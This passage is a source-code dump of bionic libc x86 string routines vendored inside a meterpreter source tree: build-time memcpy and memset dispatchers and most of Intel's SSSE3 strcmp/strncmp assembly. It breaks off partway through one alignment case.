 * memcpy.S is assembled instead.
 */
#if defined(USE_SSSE3)
/* Cache-size tuning parameters used by the SSSE3 implementation. */
# include "cache_wrapper.S"
/* NOTE(review): __i686 is presumably predefined by the compiler (e.g. with
   -march=i686) and would be macro-expanded inside the included assembly
   source; undefine it before inclusion - confirm against the build flags. */
# undef __i686
# define MEMCPY memcpy
# define USE_AS_MEMMOVE
# include "ssse3-memcpy5.S"
#else
# include "memcpy.S"
#endif
|
OpenWireSec/metasploit | 1,699 | external/source/meterpreter/source/bionic/libc/arch-x86/string/memset_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * memset dispatcher: selects an implementation at build time.
 * With USE_SSE2, the SSE2 Atom-tuned routine (sse2-memset5-atom.S) is
 * assembled under the public name "memset" via the rename below.
 * Without USE_SSE2 the generic memset.S is assembled instead.
 */
#if defined(USE_SSE2)
/* Cache-size tuning parameters used by the SSE2 implementation. */
# include "cache_wrapper.S"
/* NOTE(review): __i686 is presumably predefined by the compiler (e.g. with
   -march=i686) and would be macro-expanded inside the included assembly
   source; undefine it before inclusion - confirm against the build flags. */
# undef __i686
# define sse2_memset5_atom memset
# include "sse2-memset5-atom.S"
#else
# include "memset.S"
#endif
|
OpenWireSec/metasploit | 38,449 | external/source/meterpreter/source/bionic/libc/arch-x86/string/ssse3-strcmp.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * Compatibility shims: supply glibc-style assembler macros when the build
 * environment does not provide them.
 *   L(x)        - local (non-exported) label, .Lx
 *   cfi_*       - DWARF call-frame-information directives for unwinding
 *   ENTRY/END   - standard function bracketing (.type/.globl/.size + CFI)
 */
#ifndef L
# define L(label) .L##label
#endif
#ifndef cfi_startproc
# define cfi_startproc .cfi_startproc
#endif
#ifndef cfi_endproc
# define cfi_endproc .cfi_endproc
#endif
#ifndef cfi_rel_offset
# define cfi_rel_offset(reg, off) .cfi_rel_offset reg, off
#endif
#ifndef cfi_restore
# define cfi_restore(reg) .cfi_restore (reg)
#endif
#ifndef cfi_adjust_cfa_offset
# define cfi_adjust_cfa_offset(off) .cfi_adjust_cfa_offset off
#endif
#ifndef ENTRY
# define ENTRY(name) \
.type name, @function; \
.globl name; \
.p2align 4; \
name: \
cfi_startproc
#endif
#ifndef END
# define END(name) \
cfi_endproc; \
.size name, .-name
#endif
/* push/pop helpers that keep the CFI unwind information in sync with the
   actual stack adjustment. */
#define CFI_PUSH(REG) \
cfi_adjust_cfa_offset (4); \
cfi_rel_offset (REG, 0)
#define CFI_POP(REG) \
cfi_adjust_cfa_offset (-4); \
cfi_restore (REG)
#define PUSH(REG) pushl REG; CFI_PUSH (REG)
#define POP(REG) popl REG; CFI_POP (REG)
/*
 * Argument offsets relative to %esp on entry.  The strncmp build
 * (USE_AS_STRNCMP) pushes %ebp first (it holds the remaining byte count),
 * which shifts STR1/STR2 up by 4 and adds the third argument CNT; its
 * RETURN must therefore restore %ebp before returning (the trailing
 * CFI_PUSH rebalances the unwind info for the fall-through paths that
 * follow a RETURN in the code).
 */
#ifndef USE_AS_STRNCMP
# define STR1 4
# define STR2 STR1+4
# define RETURN ret
# define UPDATE_STRNCMP_COUNTER
#else
# define STR1 8
# define STR2 STR1+4
# define CNT STR2+4
# define RETURN POP (%ebp); ret; CFI_PUSH (%ebp)
# define UPDATE_STRNCMP_COUNTER \
/* calculate left number to compare */ \
mov $16, %esi; \
sub %ecx, %esi; \
cmp %esi, %ebp; \
jbe L(more8byteseq); \
sub %esi, %ebp
#endif
.section .text.ssse3,"ax",@progbits
ENTRY (ssse3_strcmp_latest)
#ifdef USE_AS_STRNCMP
PUSH (%ebp)
#endif
movl STR1(%esp), %edx
movl STR2(%esp), %eax
#ifdef USE_AS_STRNCMP
movl CNT(%esp), %ebp
cmp $16, %ebp
jb L(less16bytes_sncmp)
jmp L(more16bytes)
#endif
movzbl (%eax), %ecx
cmpb %cl, (%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 1(%eax), %ecx
cmpb %cl, 1(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 2(%eax), %ecx
cmpb %cl, 2(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 3(%eax), %ecx
cmpb %cl, 3(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 4(%eax), %ecx
cmpb %cl, 4(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 5(%eax), %ecx
cmpb %cl, 5(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 6(%eax), %ecx
cmpb %cl, 6(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
movzbl 7(%eax), %ecx
cmpb %cl, 7(%edx)
jne L(neq)
cmpl $0, %ecx
je L(eq)
add $8, %edx
add $8, %eax
#ifdef USE_AS_STRNCMP
cmp $8, %ebp
lea -8(%ebp), %ebp
je L(eq)
L(more16bytes):
#endif
movl %edx, %ecx
and $0xfff, %ecx
cmp $0xff0, %ecx
ja L(crosspage)
mov %eax, %ecx
and $0xfff, %ecx
cmp $0xff0, %ecx
ja L(crosspage)
pxor %xmm0, %xmm0
movlpd (%eax), %xmm1
movlpd (%edx), %xmm2
movhpd 8(%eax), %xmm1
movhpd 8(%edx), %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %ecx
sub $0xffff, %ecx
jnz L(less16bytes)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(eq)
#endif
add $16, %eax
add $16, %edx
L(crosspage):
PUSH (%ebx)
PUSH (%edi)
PUSH (%esi)
movl %edx, %edi
movl %eax, %ecx
and $0xf, %ecx
and $0xf, %edi
xor %ecx, %eax
xor %edi, %edx
xor %ebx, %ebx
cmp %edi, %ecx
je L(ashr_0)
ja L(bigger)
or $0x20, %ebx
xchg %edx, %eax
xchg %ecx, %edi
L(bigger):
lea 15(%edi), %edi
sub %ecx, %edi
cmp $8, %edi
jle L(ashr_less_8)
cmp $14, %edi
je L(ashr_15)
cmp $13, %edi
je L(ashr_14)
cmp $12, %edi
je L(ashr_13)
cmp $11, %edi
je L(ashr_12)
cmp $10, %edi
je L(ashr_11)
cmp $9, %edi
je L(ashr_10)
L(ashr_less_8):
je L(ashr_9)
cmp $7, %edi
je L(ashr_8)
cmp $6, %edi
je L(ashr_7)
cmp $5, %edi
je L(ashr_6)
cmp $4, %edi
je L(ashr_5)
cmp $3, %edi
je L(ashr_4)
cmp $2, %edi
je L(ashr_3)
cmp $1, %edi
je L(ashr_2)
cmp $0, %edi
je L(ashr_1)
/*
* The following cases will be handled by ashr_0
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(0~15) n(0~15) 15(15+ n-n) ashr_0
*/
.p2align 4
L(ashr_0):
mov $0xffff, %esi
movdqa (%eax), %xmm1
pxor %xmm0, %xmm0
pcmpeqb %xmm1, %xmm0
pcmpeqb (%edx), %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
mov %ecx, %edi
jne L(less32bytes)
UPDATE_STRNCMP_COUNTER
mov $0x10, %ebx
mov $0x10, %ecx
pxor %xmm0, %xmm0
.p2align 4
L(loop_ashr_0):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
jmp L(loop_ashr_0)
/*
* The following cases will be handled by ashr_1
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(15) n -15 0(15 +(n-15) - n) ashr_1
*/
.p2align 4
L(ashr_1):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $15, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -15(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $1, %ebx
lea 1(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_1):
add $16, %edi
jg L(nibble_ashr_1)
L(gobble_ashr_1):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $1, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_1)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $1, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_1)
.p2align 4
L(nibble_ashr_1):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfffe, %esi
jnz L(ashr_1_exittail)
#ifdef USE_AS_STRNCMP
cmp $15, %ebp
jbe L(ashr_1_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_1)
.p2align 4
L(ashr_1_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $1, %xmm0
psrldq $1, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_2
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(14~15) n -14 1(15 +(n-14) - n) ashr_2
*/
.p2align 4
L(ashr_2):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $14, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -14(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $2, %ebx
lea 2(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_2):
add $16, %edi
jg L(nibble_ashr_2)
L(gobble_ashr_2):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $2, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_2)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $2, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_2)
.p2align 4
L(nibble_ashr_2):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfffc, %esi
jnz L(ashr_2_exittail)
#ifdef USE_AS_STRNCMP
cmp $14, %ebp
jbe L(ashr_2_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_2)
.p2align 4
L(ashr_2_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $2, %xmm0
psrldq $2, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_3
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(13~15) n -13 2(15 +(n-13) - n) ashr_3
*/
.p2align 4
L(ashr_3):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $13, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -13(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $3, %ebx
lea 3(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_3):
add $16, %edi
jg L(nibble_ashr_3)
L(gobble_ashr_3):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $3, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_3)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $3, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_3)
.p2align 4
L(nibble_ashr_3):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfff8, %esi
jnz L(ashr_3_exittail)
#ifdef USE_AS_STRNCMP
cmp $13, %ebp
jbe L(ashr_3_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_3)
.p2align 4
L(ashr_3_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $3, %xmm0
psrldq $3, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_4
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(12~15) n -12 3(15 +(n-12) - n) ashr_4
*/
.p2align 4
L(ashr_4):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $12, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -12(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $4, %ebx
lea 4(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_4):
add $16, %edi
jg L(nibble_ashr_4)
L(gobble_ashr_4):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $4, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_4)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $4, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_4)
.p2align 4
L(nibble_ashr_4):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfff0, %esi
jnz L(ashr_4_exittail)
#ifdef USE_AS_STRNCMP
cmp $12, %ebp
jbe L(ashr_4_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_4)
.p2align 4
L(ashr_4_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $4, %xmm0
psrldq $4, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_5
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(11~15) n -11 4(15 +(n-11) - n) ashr_5
*/
.p2align 4
L(ashr_5):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $11, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -11(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $5, %ebx
lea 5(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_5):
add $16, %edi
jg L(nibble_ashr_5)
L(gobble_ashr_5):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $5, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_5)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $5, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_5)
.p2align 4
L(nibble_ashr_5):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xffe0, %esi
jnz L(ashr_5_exittail)
#ifdef USE_AS_STRNCMP
cmp $11, %ebp
jbe L(ashr_5_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_5)
.p2align 4
L(ashr_5_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $5, %xmm0
psrldq $5, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_6
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(10~15) n -10 5(15 +(n-10) - n) ashr_6
*/
.p2align 4
L(ashr_6):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $10, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -10(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $6, %ebx
lea 6(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_6):
add $16, %edi
jg L(nibble_ashr_6)
L(gobble_ashr_6):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $6, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_6)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $6, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_6)
.p2align 4
L(nibble_ashr_6):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xffc0, %esi
jnz L(ashr_6_exittail)
#ifdef USE_AS_STRNCMP
cmp $10, %ebp
jbe L(ashr_6_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_6)
.p2align 4
L(ashr_6_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $6, %xmm0
psrldq $6, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_7
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(9~15) n - 9 6(15 +(n-9) - n) ashr_7
*/
.p2align 4
L(ashr_7):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $9, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -9(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $7, %ebx
lea 8(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_7):
add $16, %edi
jg L(nibble_ashr_7)
L(gobble_ashr_7):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $7, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_7)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $7, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_7)
.p2align 4
L(nibble_ashr_7):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xff80, %esi
jnz L(ashr_7_exittail)
#ifdef USE_AS_STRNCMP
cmp $9, %ebp
jbe L(ashr_7_exittail)
#endif
pxor %xmm0, %xmm0
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_7)
.p2align 4
L(ashr_7_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $7, %xmm0
psrldq $7, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_8
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(8~15) n - 8 7(15 +(n-8) - n) ashr_8
*/
.p2align 4
L(ashr_8):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $8, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -8(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $8, %ebx
lea 8(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_8):
add $16, %edi
jg L(nibble_ashr_8)
L(gobble_ashr_8):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $8, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_8)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $8, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
